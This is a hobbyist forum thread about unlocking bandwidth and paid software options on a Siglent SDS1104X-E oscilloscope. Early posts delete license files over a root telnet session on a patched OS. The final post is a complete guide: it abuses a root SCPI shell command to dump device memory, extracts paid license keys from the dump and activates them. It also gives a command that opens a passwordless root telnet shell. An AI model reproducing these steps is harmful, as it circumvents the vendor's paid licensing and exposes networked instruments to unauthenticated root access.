Author Topic: Siglent SDS1104X-E Hack to 200Mhz, and full options ?  (Read 66418 times)

0 Members and 3 Guests are viewing this topic.

Offline S.Garrix

  • Newbie
  • Posts: 2
Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« on: July 11, 2018, 03:29:13 pm »
I have two Siglent 1104x-e in my lab, and noticed the thread:https://www.eevblog.com/forum/testgear/siglent-sds1204x-e-released-for-domestic-markets-in-china/825/
and in Reply #785 @ian.ameline “upgraded” the SDS1104X-E to 200Mhz, Rf loop confirmed
thanks to Ian and rfloop,  I patch the OS update so that the root password is known, and had one of my SDS1104X-E upgraded to 200Mhz ,
1. patch the OS update , set password
2. Connect SDS1104X-E by telnet.
3. Input command "mount -o remount,rw,sync /usr/bin/siglent/firmdata0".
4. Input command "rm /usr/bin/siglent/firmdata0/bandwidth.txt".
5. Restart the scope.         

!!Update for commands
 by the exact same way I also got MSO,AWG, WIFI full options
Step 4,  command "rm /usr/bin/siglent/firmdata0/options_mso_times.txt".
"rm /usr/bin/siglent/usr/usr/options_mso_times.txt"
         "rm /usr/bin/siglent/firmdata0/options_awg_times.txt"
"rm/usr/bin/siglent/usr/usr/options_awg_times.txt"
"rm /usr/bin/siglent/firmdata0/options_wifi_times.txt"
"rm /usr/bin/siglent/usr/usr/options_wifi_times.txt"

Not sure if Siglent will close the door or not
« Last Edit: July 18, 2018, 07:01:10 am by S.Garrix »
 
The following users thanked this post: TheNewLab, ian.ameline, Coldblackice

Offline innkeeper

  • Supporter
  • ****
  • Posts: 616
  • Country: us
Re: SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #1 on: July 11, 2018, 04:47:02 pm »
unless someone sees fault with this, id use an mv (move) command to move it to a new name or place instead of rm (remove) in case you ever needed to put it back.



Hobbyist and a retired engineer and possibly a test equipment addict, though, searching for the equipment to test for that.
 

Offline GregDunn

  • Frequent Contributor
  • **
  • Posts: 731
  • Country: us
Re: SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #2 on: July 11, 2018, 05:51:27 pm »
Yes, definitely do not remove the files - suppose Siglent requires them to be present for an OS or firmware upgrade at some future time?  You'd have to restore them from your backup (you did make a backup, right?).   :D
 

Offline tubularnut

  • Regular Contributor
  • *
  • Posts: 140
  • Country: gb
Re: SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #3 on: July 11, 2018, 06:12:26 pm »
The files only contain the text "30" , if you still have the 30 remaining times.

However, it didn't work for me, either by renaming the files (mv) or deleting them.

As a note there are also 3 copies in the folder "/usr/bin/siglent/usr/usr" which get recreated if you rename or delete them.
 

Offline GregDunn

  • Frequent Contributor
  • **
  • Posts: 731
  • Country: us
Re: SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #4 on: July 11, 2018, 06:30:30 pm »
Those files don't even exist on my scope in the firmdata0 directory...  and I can confirm that renaming the files in /usr/bin/siglent/usr/usr doesn't work.
 

Offline BillB

  • Supporter
  • ****
  • Posts: 612
  • Country: us
Re: SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #5 on: July 11, 2018, 10:50:45 pm »
Those files don't even exist on my scope in the firmdata0 directory...  and I can confirm that renaming the files in /usr/bin/siglent/usr/usr doesn't work.

Hmmm...

Code: [Select]
/usr/bin/siglent/firmdata0 # ls -l
total 140
-rw-r--r--    1 root     root           241 Jan  1 00:33 NSP_system_info.xml
-rw-r--r--    1 root     root            63 Jan  1 00:00 NSP_trends_config_info.xml
--wxr-Sr--    1 root     root          7012 Jan  1 00:31 acq_quick_cal_factory.bin
-rwxrwxrwx    1 1000     1000          7688 Aug 21  2017 acq_self_cal_user.bin
-rwxrwxrwx    1 1000     1000          7448 Jan  1 00:15 acq_self_factory_cal.bin
-rwxrwxrwx    1 1000     1000            16 Jan  1 00:00 bandwidth.bak
-rwxrwxrwx    1 root     root         52916 Jan  1 00:00 factory_setting.xml
---sr----x    1 root     root            20 Jan  1 00:23 options_awg_cfg.bin
---sr----x    1 root     root            20 Jan  1 00:23 options_awg_license.txt
-------r-x    1 root     root            10 Jan  1 00:00 options_awg_times.txt
-rwx--sr-T    1 root     root            20 Jan  1 00:21 options_mso_cfg.bin
-rwx--sr-T    1 root     root            20 Jan  1 00:21 options_mso_license.txt
------x---    1 root     root            10 Jan  1 00:00 options_mso_times.txt
--ws--x---    1 root     root            20 Jan  1 00:25 options_wifi_cfg.bin
--ws--x--x    1 root     root            20 Jan  1 00:25 options_wifi_license.txt
-------r-x    1 root     root            10 Jan  1 00:00 options_wifi_times.txt
-rwxrwxrwx    1 1000     1000            16 Jan  1 00:00 pro_filter_cfg.bin
-rw-r--r--    1 root     root          3320 Jan  1 00:00 sys_cfg.cfg
-rwxrwxrwx    1 1000     1000            67 Aug 21  2017 version.txt
-rw-r--r--    1 root     root             5 Jan  1 00:00 whoami.txt
/usr/bin/siglent/firmdata0 #

This is with the both the latest firmware and OS updates: 7.1.6.1.25R2
 
« Last Edit: July 11, 2018, 11:17:43 pm by BillB »
 
The following users thanked this post: tautech

Offline GregDunn

  • Frequent Contributor
  • **
  • Posts: 731
  • Country: us
Re: SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #6 on: July 12, 2018, 12:38:57 am »
Code: [Select]
/usr/bin/siglent/firmdata0 # ls -l
total 100
-rw-r--r--    1 root     root           241 Jan  1 00:02 NSP_system_info.xml
-rw-r--r--    1 root     root            63 Jan  1 00:00 NSP_trends_config_info.xml
--wxr-Sr--    1 root     root          7012 Jan  1 00:31 acq_quick_cal_factory.bin
-rwxrwxrwx    1 1000     1000          7688 Sep 18  2017 acq_self_cal_user.bin
-rwxrwxrwx    1 1000     1000          7448 Jan  1 00:05 acq_self_factory_cal.bin
-rwxrwxrwx    1 1000     1000            16 Jan  1 00:01 bandwidth.bak
-rwxrwxrwx    1 root     root         52916 Jan  1 00:00 factory_setting.xml
-rwxrwxrwx    1 1000     1000            16 Jan  1 00:01 pro_filter_cfg.bin
-rw-r--r--    1 root     root          3320 Jan  1 00:00 sys_cfg.cfg
-rwxrwxrwx    1 1000     1000            67 Sep 18  2017 version.txt

Very interesting...  7.1.6.1.25 R2 here too.
 

Offline SMB784

  • Frequent Contributor
  • **
  • Posts: 322
  • Country: us
    • Tequity Surplus
Re: SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #7 on: July 12, 2018, 02:14:10 am »
Code: [Select]
/usr/bin/siglent/firmdata0 # ls -l
total 100
-rw-r--r--    1 root     root           241 Jan  1 00:02 NSP_system_info.xml
-rw-r--r--    1 root     root            63 Jan  1 00:00 NSP_trends_config_info.xml
--wxr-Sr--    1 root     root          7012 Jan  1 00:31 acq_quick_cal_factory.bin
-rwxrwxrwx    1 1000     1000          7688 Sep 18  2017 acq_self_cal_user.bin
-rwxrwxrwx    1 1000     1000          7448 Jan  1 00:05 acq_self_factory_cal.bin
-rwxrwxrwx    1 1000     1000            16 Jan  1 00:01 bandwidth.bak
-rwxrwxrwx    1 root     root         52916 Jan  1 00:00 factory_setting.xml
-rwxrwxrwx    1 1000     1000            16 Jan  1 00:01 pro_filter_cfg.bin
-rw-r--r--    1 root     root          3320 Jan  1 00:00 sys_cfg.cfg
-rwxrwxrwx    1 1000     1000            67 Sep 18  2017 version.txt

Very interesting...  7.1.6.1.25 R2 here too.

Have you also installed the latest software update?

Offline GregDunn

  • Frequent Contributor
  • **
  • Posts: 731
  • Country: us
Re: SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #8 on: July 12, 2018, 02:47:05 am »
I installed the latest versions from Siglent's website as soon as I verified the scope was running properly:

SDS1004X-E Firmware (4-Channel Model) - 6.1.25R2 (Release Date 06.05.18 )
SDS1004X-E Operating System -V1 (Only For 4-Channel ) (Release Date 06.26.18 )

That's 7.1 (OS).6.1.25R2 (firmware), as I indicated, right?
 

Offline innkeeper

  • Supporter
  • ****
  • Posts: 616
  • Country: us
Re: SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #9 on: July 12, 2018, 03:21:35 am »
7.1.6.1.25 R2 here too - similar - no mso,wifi,awg configs
and i did install and run the latest software - EasyScopeX – 100R001B02D01P20 (Release Date 06.07.18 ) (if that's what your referring to)
is there a newer os image we should be using?

Code: [Select]
/usr/bin/siglent/firmdata0 # ls -l
total 112
-rw-r--r--    1 root     root           241 Jan  1 00:00 NSP_system_info.xml
-rw-r--r--    1 root     root            63 Jan  1 00:00 NSP_trends_config_info.xml
--wxr-Sr--    1 root     root          7012 Jan  1 00:32 acq_quick_cal_factory.bin
-rwxrwxrwx    1 1000     1000          7688 Sep 18  2017 acq_self_cal_user.bin
-rwxrwxrwx    1 1000     1000          7448 Jan  1 00:12 acq_self_factory_cal.bin
-rwxrwxrwx    1 1000     1000            16 Jan  1 00:01 bandwidth.bak
-rwxrwxrwx    1 root     root         52916 Jan  1 00:00 factory_setting.xml
-------r-x    1 root     root            10 Jan  1 00:00 options_awg_times.txt
------x---    1 root     root            10 Jan  1 00:00 options_mso_times.txt
------x---    1 root     root            10 Jan  1 00:00 options_wifi_times.txt
-rwxrwxrwx    1 1000     1000            16 Jan  1 00:01 pro_filter_cfg.bin
-rw-r--r--    1 root     root          3320 Jan  1 00:00 sys_cfg.cfg
-rwxrwxrwx    1 1000     1000            67 Sep 18  2017 version.txt
/usr/bin/siglent/firmdata0 #
« Last Edit: July 12, 2018, 03:35:19 am by innkeeper »
Hobbyist and a retired engineer and possibly a test equipment addict, though, searching for the equipment to test for that.
 

Offline GregDunn

  • Frequent Contributor
  • **
  • Posts: 731
  • Country: us
Re: SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #10 on: July 12, 2018, 05:11:48 pm »
Are you suggesting that (for example) he has a wifi adapter plugged in, and set it up in the options?  Mine won't let me configure any of those options because the hardware is not attached; nonetheless, the temp licenses still show up on it:
 

Offline GregDunn

  • Frequent Contributor
  • **
  • Posts: 731
  • Country: us
Re: SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #11 on: July 12, 2018, 06:16:01 pm »
Agreed.
 

Online tautech

  • Super Contributor
  • ***
  • Posts: 20468
  • Country: nz
  • Taupaki Technologies Ltd. NZ Siglent Distributor
    • Taupaki Technologies Ltd.
Re: SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #12 on: July 12, 2018, 07:59:28 pm »
Are you suggesting that (for example) he has a wifi adapter plugged in, and set it up in the options?  Mine won't let me configure any of those options because the hardware is not attached; nonetheless, the temp licenses still show up on it:
Correct.

The option HW modules at substantial extra cost so it's debatable that you need MSO and AWG permanent licensing whereas the WiFi HW is cheap at acquire. Just to do Bode plot no licensing at all is required.

BTW, see how your ch 3 and 4 0V position indicators are the same but the traces are not......means you need to run the Auto Cal.
Avid Rabid Hobbyist
 

Offline kerouanton

  • Regular Contributor
  • *
  • Posts: 60
  • Country: ch
Re: SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #13 on: July 14, 2018, 07:34:15 pm »
The option HW modules at substantial extra cost so it's debatable that you need MSO and AWG permanent licensing whereas the WiFi HW is cheap at acquire. Just to do Bode plot no licensing at all is required.

Agreed. I don't see the point of having to activate options that require a specific, proprietary hardware. I ordered the SLA1016 and just received the license code to activate the software option. It seems obvious this option is totally useless without the hardware, which embedds a FPGA, buffer memory chips and probably another ARM processor to manage the whole. So the activation should simply be done by plugging the corresponding hardware (which has its own serial number).

Btw, since I managed to telnet into my 1104X-E and make full backups today, before and after activating the MSO option, it may be interesting to have a look at the changes on those backup files.
 

Offline S.Garrix

  • Newbie
  • Posts: 2
Re: SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #14 on: July 17, 2018, 09:42:30 am »
what I can see after resetting is all option times back to 30 times
 

Offline ian.ameline

  • Regular Contributor
  • *
  • Posts: 67
  • Country: ca
Re: SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #15 on: July 17, 2018, 02:15:29 pm »
You could try putting a larger number than "30" into those files. Try "32767" or "65535" or if you are feeling adventurous, "2147483647"
(2^15-1, 2^16-1 and 2^31-1)

 
 

Offline timgiles

  • Regular Contributor
  • *
  • Posts: 238
  • Country: se
  • Programmer, DB architect
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #16 on: July 26, 2018, 01:44:50 pm »
When I edit the options - it opens in vi as read only. What am I doing wrong?
 

Offline SMB784

  • Frequent Contributor
  • **
  • Posts: 322
  • Country: us
    • Tequity Surplus
Re: SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #17 on: July 26, 2018, 02:48:43 pm »
You could try putting a larger number than "30" into those files. Try "32767" or "65535" or if you are feeling adventurous, "2147483647"
(2^15-1, 2^16-1 and 2^31-1)

Does anyone know if this worked?

Offline ian.ameline

  • Regular Contributor
  • *
  • Posts: 67
  • Country: ca
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #18 on: July 26, 2018, 02:52:28 pm »
When I edit the options - it opens in vi as read only. What am I doing wrong?

You need to remount as read/write

(Search the ads forum for "remount" for the form of the command)

 

Offline timgiles

  • Regular Contributor
  • *
  • Posts: 238
  • Country: se
  • Programmer, DB architect
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #19 on: July 26, 2018, 10:12:51 pm »
Thanks, Ill come back to the thread in the morning once I have a second bite of the sav!
 

Offline TheNewLab

  • Frequent Contributor
  • **
  • Posts: 260
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #20 on: July 27, 2018, 06:30:34 am »
I want to do the MSO hack, and attempt to design my own hardware unit. What I have heard is the SLA1016 is nothing to write home about. For $200, my thought is why not make my own hardware unit to experiment/play around with?

Only I noticed above something about a serial number inside the SLA1016 that helps activate the feature on the scope?

What type of programming do I learn to try and encode the FPGA with? and other chips for a DIY SLA1016? Has anyone scanned or reversed engineered the PCB board inside the SLA1016?
RIght now, the only difficulty I see in getting parts is the non-standard SBUS connector

I am having too much fun pushing my first actual legitimate oscilloscope.. :-X ::)
 
The following users thanked this post: Coldblackice

Offline timgiles

  • Regular Contributor
  • *
  • Posts: 238
  • Country: se
  • Programmer, DB architect
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #21 on: July 27, 2018, 03:47:23 pm »
Hi all,

Any value inserted in to the three text files (/usr/bin/siglent/usr/usr/options....) over 30, is shown as 30 in the menu 'Options' on the scope on restart.

What would be interesting is what would happen to the actual value in the text file if I have the MSO or AWG hardware. I assume it would tick from my set value (500 say) to 29 once the HW is plugged in the first time. But prehaps it is only the view function in the code that knows the maximum value for a temporary licence is 30...

Has someone tried the temporary licences and resetting to 30? Prehaps Ill buy the MSO or AWG and find out. The SAG isnt too expensive...


Nice idea to reverse engineer the SLA1016 protocol NewLab.



 

Offline BillB

  • Supporter
  • ****
  • Posts: 612
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #22 on: July 27, 2018, 04:13:39 pm »
...
Only I noticed above something about a serial number inside the SLA1016 that helps activate the feature on the scope?
...

I believe the activation license for the MSO option on the scope is completely independent of the SLA1016.  That is, I do not believe the MSO option is locked to any particular SLA1016.  I've got one SDS1104X-E and and one SLA1016, so I can't confirm 100%, but the scope MSO option was activated prior to installing the SLA1016.

« Last Edit: July 27, 2018, 04:31:02 pm by BillB »
 

Offline tmbinc

  • Regular Contributor
  • *
  • Posts: 235
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #23 on: July 27, 2018, 04:19:31 pm »
It would be great if someone could make pictures of the SLA1016. Based on my information (but I could be wrong; I haven't ever seen this device) the SLA1016 is a Zynq-based essentially "stand-alone LA", connected via "SBUS" via relatively-slow (non-realtime; USB even?) communication. Especially the sample memory seems to be on the SLA1016 itself.

Would be great if someone could confirm/refute this.
 

Offline ironcurtain

  • Regular Contributor
  • *
  • Posts: 62
  • Country: es
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #24 on: July 28, 2018, 06:20:16 pm »
Hey, just joined this. My time at the moment for personal reasons is very limited, but I can offer help and advice on reverse engineering firmware and Linux ELF DSOs and executables.

I own a SDS1204X-E though, and I can't or couldn't find the firmware images for my kit. I would like to unlock the WIFI options and others, especially if we can interface it with third-party solutions that are more affordable, or better quality.

I'm somewhat of a novice with EE, but I will trade OS design/reversing knowhow for some mentoring every now and then.

As for the firmware images: I see that they obfuscate them with XOR, correct? And another part is "encrypted" with a modified version of 3DES, presumably with the key known to us (they need to ship it so...). Are there any tools for reassembling images readily available?
 

Offline TheNewLab

  • Frequent Contributor
  • **
  • Posts: 260
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #25 on: August 01, 2018, 06:08:52 am »
S.Garrix has the procedure for hacking the options, there are some questions though. No one has confirmed if it works for their units. It should be the same for all three of the 1000X-E models
 

Offline SaKhan

  • Contributor
  • Posts: 17
  • Country: ch
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #26 on: September 19, 2018, 04:59:52 pm »
I did the following trying to make the wifi option permanent:

After confirming that the value in /usr/bin/siglent/firmdata0/options_wifi_times.txt gets decremented after each boot, I remounted /usb/bin/siglent read-write and changed /usr/bin/siglent/usr/usr/options_wifi_times.txt with the plugged wifi dongle back to 30. After rebooting, both files had the same value - 30 and any further reboots didn't decrement it anymore. I tried several things afterwards to revert the hack but I couldn't, so if you intend to try it keep that in mind. I hope also that these were the correct steps as I tried that 2 weeks ago. Don't forget also to execute sync and remount read-only afterwards.
 

Offline kahuna0k

  • Regular Contributor
  • *
  • Posts: 68
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #27 on: September 22, 2018, 05:11:59 am »
hi, I'm trying to flash the _eevblog OS to gain root access, but when I plug the USB and power on nothing happens. The scope just starts as usual and the known password doesn't work. I've tried formatting and copying the files from Linux and Windows, from two different computers and in two different USB keys, all with the same result. My scope already come with 7.1.6.1.25 R2 software version (FPGA Version 2018-03-06 and HW Version 01-03). Could this be the reason? I tried to update the OS using the official firmware and nothing happen either (probably because it is already running that version). Any hint?
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #28 on: September 22, 2018, 09:19:02 am »
hi, I'm trying to flash the _eevblog OS to gain root access, but when I plug the USB and power on nothing happens. The scope just starts as usual and the known password doesn't work. I've tried formatting and copying the files from Linux and Windows, from two different computers and in two different USB keys, all with the same result. My scope already come with 7.1.6.1.25 R2 software version (FPGA Version 2018-03-06 and HW Version 01-03). Could this be the reason? I tried to update the OS using the official firmware and nothing happen either (probably because it is already running that version). Any hint?

The equip isn't recognizing the USB. Verify that you can save files to the USB key to check if it's available. You should be able to upgrade indefinitely.
 

Offline kahuna0k

  • Regular Contributor
  • *
  • Posts: 68
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #29 on: September 22, 2018, 09:39:39 am »
I'm able to capture files with the print button to the usb drive. They appear under \PNG and look ok. I've also tried with a Raspberry Pi (as suggested somewhere else) with the same result. Updating the firmware works without problems (through the menus). The problem is that the scope ignore the update to the OS. When booting it access the usb drive (the light lights up 3 times for around 2 seconds each and 1 last time for around 1 second.  The files in the root of the USB are:
devicetree.dtb
rootfs.cramfs
sds1004x_e_udiskEnv.txt
uImage

in the pdf it seems that the .txt does not have the extension, but I suppose it is because Windows hides it by default. Anyway I tried without the .txt and didn't work either. Also in the PDF, the uImage seems to have a space after ("uImage "), but probably is a mistake, I think it is possible to have a space at the end of a filename in FAT32 but it is not trivial to achieve. Running out of things to try. Right now I'm trying to explot the fact that the SHELLCMD SCPI command is executed as root to change the password, but it is not that easy, "passwd -d root" seems to do nothing, probably because /etc is mounted as read only. Could anybody with root access execute mount (if possible with a USB inserted) and pasted it here?
 

Offline kahuna0k

  • Regular Contributor
  • *
  • Posts: 68
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #30 on: September 22, 2018, 09:49:11 am »
well, after trying with the 3rd USB drive it worked ... Murphy is around me :)
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #31 on: September 22, 2018, 10:05:06 am »
but it is not that easy, "passwd -d root" seems to do nothing, probably because /etc is mounted as read only. Could anybody with root access execute mount (if possible with a USB inserted) and pasted it here?

If that was possible, life would be easier for everyone. You can't do that because CRAMFS is RO. That's why the FS needs to be patched beforehand.
 

Offline rf-loop

  • Super Contributor
  • ***
  • Posts: 3483
  • Country: cn
  • Born with DLL21 in hand
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #32 on: September 22, 2018, 02:00:01 pm »
well, after trying with the 3rd USB drive it worked ... Murphy is around me :)

One question, and if someone other wonder, do not think anything,  this is only because i am curious and investigative nature.  ;)

These USB drive sizes, and speed version, these what fails and this what work.
« Last Edit: September 22, 2018, 02:02:02 pm by rf-loop »
If practice and theory is not equal it tells that used application of theory is wrong or the theory itself is wrong.
-
Harmony OS
 

Offline kahuna0k

  • Regular Contributor
  • *
  • Posts: 68
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #33 on: October 13, 2018, 10:31:39 pm »
well, after trying with the 3rd USB drive it worked ... Murphy is around me :)

One question, and if someone other wonder, do not think anything,  this is only because i am curious and investigative nature.  ;)

These USB drive sizes, and speed version, these what fails and this what work.

kingston 16GB USB2 -> fail
samsung 16GB USB3 -> fail
sharkoon accelerate 32GB USB3 -> success
 

Offline tubularnut

  • Regular Contributor
  • *
  • Posts: 140
  • Country: gb
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #34 on: October 14, 2018, 07:00:58 am »
Kingston DataTraveler G4 32GB usb3 = success
Lexar 8GB usb2 = success
 

Offline rf-loop

  • Super Contributor
  • ***
  • Posts: 3483
  • Country: cn
  • Born with DLL21 in hand
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #35 on: October 14, 2018, 07:38:17 am »
well, after trying with the 3rd USB drive it worked ... Murphy is around me :)

One question, and if someone other wonder, do not think anything,  this is only because i am curious and investigative nature.  ;)

These USB drive sizes, and speed version, these what fails and this what work.

kingston 16GB USB2 -> fail
samsung 16GB USB3 -> fail
sharkoon accelerate 32GB USB3 -> success

Good, it also gives a signal that the Siglent's the instructions are based on something.




Instructions for OS update tell it clearly:  8G or 32G.
In my logic it do not include 16G at all.
(But still I do not know why  16G is prohibited. I am curious to know why.
But if manufacturer set this kind of rule and if I understand or not  what is reason I still follow it. )

If practice and theory is not equal it tells that used application of theory is wrong or the theory itself is wrong.
-
Harmony OS
 
The following users thanked this post: kahuna0k

Offline bugi

  • Frequent Contributor
  • **
  • Posts: 250
  • Country: fi
  • Hobbyist using the ultra slow and unsure method
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #36 on: October 14, 2018, 09:33:49 am »
I guess the instructions should use the word "MUST" instead of "should" in that case. Just to reduce the amount of ? ? ?!?!?%%#***@!! from users.
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #37 on: October 14, 2018, 09:46:38 am »
Siglent designers seated at the coffee table: "let's do this work only in 8GB and 32GB sizes!"  :-DD

BTW i suggest that you should all report a few other details of the USB disks (namely the controller):
https://www.eevblog.com/forum/testgear/siglent-sdm3045x-boot-hang/msg1565089/#msg1565089
 

Offline timgiles

  • Regular Contributor
  • *
  • Posts: 238
  • Country: se
  • Programmer, DB architect
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #38 on: October 14, 2018, 12:08:07 pm »
Worked fine when I used a 4Gb USB drive.
 
The following users thanked this post: MadS

Offline Coldblackice

  • Contributor
  • Posts: 15
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #39 on: November 11, 2018, 09:26:36 pm »
Anyone had any further progress (or luck!) on this? I'm considering getting this scope and would love to help out, if it's still thought that achieving this would be feasible.
 

Online tautech

  • Super Contributor
  • ***
  • Posts: 20468
  • Country: nz
  • Taupaki Technologies Ltd. NZ Siglent Distributor
    • Taupaki Technologies Ltd.
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #40 on: November 11, 2018, 09:34:08 pm »
Anyone had any further progress (or luck!) on this? I'm considering getting this scope and would love to help out, if it's still thought that achieving this would be feasible.
You can find some info here:
https://www.eevblog.com/forum/testgear/sds1104x-e-hack-to-200mhz-and-full-options/
Avid Rabid Hobbyist
 

Offline Coldblackice

  • Contributor
  • Posts: 15
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #41 on: November 20, 2018, 02:48:43 am »
Anyone had any further progress (or luck!) on this? I'm considering getting this scope and would love to help out, if it's still thought that achieving this would be feasible.
You can find some info here:
https://www.eevblog.com/forum/testgear/sds1104x-e-hack-to-200mhz-and-full-options/

Thanks, but was that link meant to point somewhere else? It points to this same thread. I read through the thread + how to do it, but was wondering how this has been faring for those who have tried it:

  • Does it actually work vs. just appearing to support/run at 200mhz?
  • Has anyone noticed any issues?
  • Have firmware updates affected it?
  • etc.
« Last Edit: November 20, 2018, 02:55:56 am by Coldblackice »
 

Online tautech

  • Super Contributor
  • ***
  • Posts: 20468
  • Country: nz
  • Taupaki Technologies Ltd. NZ Siglent Distributor
    • Taupaki Technologies Ltd.
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #42 on: November 20, 2018, 02:55:39 am »
Thanks, though was that link meant to point to somewhere else? It points to this same thread. Unless I'm misunderstanding the current status of this: my understanding is that the hack wasn't fully working/fleshed out (based on the followup discussion in the thread). If not,
Sorry.

Read here too:
https://www.eevblog.com/forum/testgear/siglent-ads-firmware-file-format/
Avid Rabid Hobbyist
 
The following users thanked this post: Coldblackice

Offline ripnoel

  • Newbie
  • Posts: 1
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #43 on: February 27, 2019, 06:42:09 am »
Greetings,

I am ready to move forward with my purchase of a Siglent SDS1104X-E and I am wondering if anyone who has recently purchased one of these units can confirm that this hack is still working? Replies and additional info greatly appreciated!

Cheers,

ripnoel
 

Offline Gege34

  • Contributor
  • Posts: 22
  • Country: fr
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #44 on: February 27, 2019, 06:59:20 am »
Ordered last month. I used the memory dump and a hex editor to find all the keys.
 

Offline dkggpeters

  • Contributor
  • Posts: 31
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #45 on: March 05, 2019, 02:06:25 am »
Greetings,

I am ready to move forward with my purchase of a Siglent SDS1104X-E and I am wondering if anyone who has recently purchased one of these units can confirm that this hack is still working? Replies and additional info greatly appreciated!

Cheers,

ripnoel

I just hacked mine over the weekend with no issues.  I purchased my unit back in August of 2018.  Also hacked sdg2042x and spd3303x-e.  No issues do all three.
 

Offline NicoEFI

  • Newbie
  • Posts: 1
  • Country: fr
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #46 on: March 10, 2019, 11:14:08 am »
Hello, I received my new Siglent SDS1104x-e.  :-+
I want upgrade it but i have a problem with my english for understand the process  :-// .
Can you help me please (Gege34 peux être ?).

1. patch the OS update
this file ? SDS1xx4X-E Operating System -V1 (Only For 4-Channel models) (Release Date 06.26.18 )
1. set password = where can i find it ?
2. Connect SDS1104X-E by telnet : by usb or RJ45 ? telnet can work with windows10 ?
3-4. Input command " " : i use it in Telnet that right ?
 

Offline Gege34

  • Contributor
  • Posts: 22
  • Country: fr
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #47 on: March 10, 2019, 01:31:33 pm »
All necessary informations are here and found by others (thank to them :-+).
To summarize, I put what I use below (English and French). I use the technics of memory dump which works very well and avoids flashing an alternative firmware.

English:
All of this only works with firmware <= 6.1.26, from firmware 6.1.33 the SHELLCMD is deactivated. But you can downgrade the scope to 6.1.26 to find the keys and after upgrade it to the last version.
  • Have a USB stick that is recognized by the oscilloscope (make a screenshot on it to try)
  • Connect to the oscilloscope with the web interface
  • In the SCPI tab, send the command SCOPEID? and note the result, it is like wwww-xxxx-yyyy-zzzz
  • Send the command *IND? to get the serial number like SDSxxxxxxxxxxxx
  • Send the command SHELLCMD cat /dev/mem > /usr/bin/siglent/usr/mass_storage/U-disk0/memdump.bin
  • Wait a while for this command to finish (we will say 1mn, there is 240MB to write on the USB stick)
  • Put the USB stick on a computer, there must be a file memdump.bin
  • Open this file in a Hex editor (I use HxD on windows)
  • Find your SCOPEID without the - (so wwwwxxxxyyyyzzzz)
  • We must have just before a 100M (or 200M according to its oscilloscope), it's the active bandwidth and still a little (37 characters) above SDS1000X-E
  • A little lower (116 characters) there must be letters, in fact 2 groups of 16 characters and one of 32 characters (that we cut in half), which makes us 4 groups of 16 characters corresponding to the key to activate the bandwidth option (respectively 100MHz, 200MHz, 50MHz, 70MHz)
  • To activate the corresponding license it is necessary to send the command SCPI MCBD key and to turn off/on again the scope
  • Start again from the beginning of the file and look for its serial number (SDSxxxxxxxxxxxx), search until find the one where it is written MSO 5 characters before
  • A little lower (69 or 117 characters) a group of readable characters, there are 3 groups of 16 characters which correspond to the activation key of options, if this key appears 2 times is that it's already active. The options are respectively (AWG, WIFI, MSO) and can be activated with the command SCPI LCISL option,key
An interesting SCPI command to explore the scope (warning to not brick it), SHELLCMD telnetd -l/bin/sh -p9999 open a telnet (root shell) without password.

Français:
Tout ceci ne fonctionne qu'avec un firmware <= 6.1.26, à partir du firmware 6.1.33 la commande SHELLCMD a été désactivé. Mais vous pouvez rétrograder votre oscilloscope avec le firmware 6.1.26 pour trouver les clefs, puis remettre le dernier firmware.
